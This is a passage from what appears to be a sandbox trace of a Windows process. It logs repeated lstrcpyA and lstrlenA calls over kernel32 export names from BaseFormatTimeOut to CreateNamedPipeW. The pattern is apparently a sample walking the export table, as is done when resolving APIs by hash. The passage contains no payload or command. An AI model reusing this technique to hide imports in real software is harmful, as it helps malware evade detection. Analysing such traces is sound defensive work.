returned="BaseFormatTimeOut" [0086.650] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.650] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.650] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.650] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.650] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.650] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.650] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.651] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.651] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.651] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.651] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.651] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.651] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.651] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.651] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.651] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.651] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.651] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.651] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.651] lstrlenA (lpString="BEEP") returned 4 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.651] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.651] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.651] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.651] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.652] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.652] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.652] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.652] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.652] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.652] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.652] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.652] lstrlenA (lpString="CANCELIO") returned 8 [0086.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.652] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.652] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.652] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.652] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.652] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.652] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.652] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.652] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.652] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.652] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.653] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.653] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.653] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.653] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.653] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.653] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.653] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.653] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.653] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.653] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.653] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.653] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.653] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.653] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.653] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.653] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.653] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.653] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.654] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.654] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.654] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.654] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.654] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.654] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.654] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.654] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.654] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.654] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.654] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.654] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.654] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.655] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.655] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.655] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.655] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.655] lstrlenA (lpString="COPYFILEA") returned 9 [0086.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.655] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.655] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.655] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.655] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.655] lstrlenA (lpString="COPYFILEW") returned 9 [0086.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.655] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.655] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.655] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.655] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.655] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.656] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.656] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.656] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.656] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.656] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.656] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.656] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.656] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.656] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.656] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.656] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.656] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.656] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.656] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.656] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.656] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.656] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.657] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.657] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.657] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.657] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.657] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.657] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.657] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.657] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.657] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.657] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.657] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.657] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.657] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.657] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.657] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.657] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.657] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.657] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.658] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.658] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: 